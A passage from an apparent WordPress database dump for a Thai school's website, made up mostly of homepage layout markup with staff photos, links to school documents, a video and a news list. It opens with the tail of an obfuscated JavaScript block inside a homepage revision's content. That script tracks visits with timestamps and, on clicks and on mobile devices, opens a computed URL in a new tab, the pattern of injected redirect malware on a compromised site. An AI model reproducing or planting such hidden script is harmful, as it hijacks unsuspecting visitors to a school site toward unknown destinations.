Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:42:36','2025-07-15 07:42:36','',19,'http://watprato.ssk.in.th/?p=689',0,'revision','',0),
(690,1,'2025-07-15 14:46:31','2025-07-15 07:46:31','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 